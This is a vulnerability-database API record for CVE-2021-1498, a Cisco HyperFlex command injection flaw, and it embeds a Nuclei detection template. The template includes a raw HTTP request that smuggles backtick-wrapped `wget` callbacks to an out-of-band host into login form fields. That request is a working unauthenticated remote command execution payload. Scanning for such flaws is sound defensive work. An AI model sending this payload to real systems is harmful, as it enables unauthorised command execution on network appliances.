{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-1498/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-1498/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-1498/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-1498/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-1498/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-1498"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-1498"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-1498.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-1498\n\ninfo:\n  name: Cisco HyperFlex HX Data Platform - Remote Command Execution\n  author: gy741\n  severity: critical\n  description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.\n  remediation: |\n    Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.\n  reference:\n    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-1498\n    - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html\n    - https://twitter.com/Unit42_Intel/status/1402655493735206915\n    - https://twitter.com/ptswarm/status/1390300625129201664\n    - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution\n    - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-1498\n    cwe-id: CWE-78\n    epss-score: 0.99999\n    epss-percentile: 0.9999\n    cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: cisco\n    product: hyperflex_hx_data_platform\n  tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /storfs-asup HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220037bdce052f6e8a182ca68f984e8e752ee9cdad3ed9a77200a5f6e10fcf4320a022100a086ccfb206ea85be9ba8e180c56e5d7031c992bab935d95bccea79cf08e5d6c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-1498"
}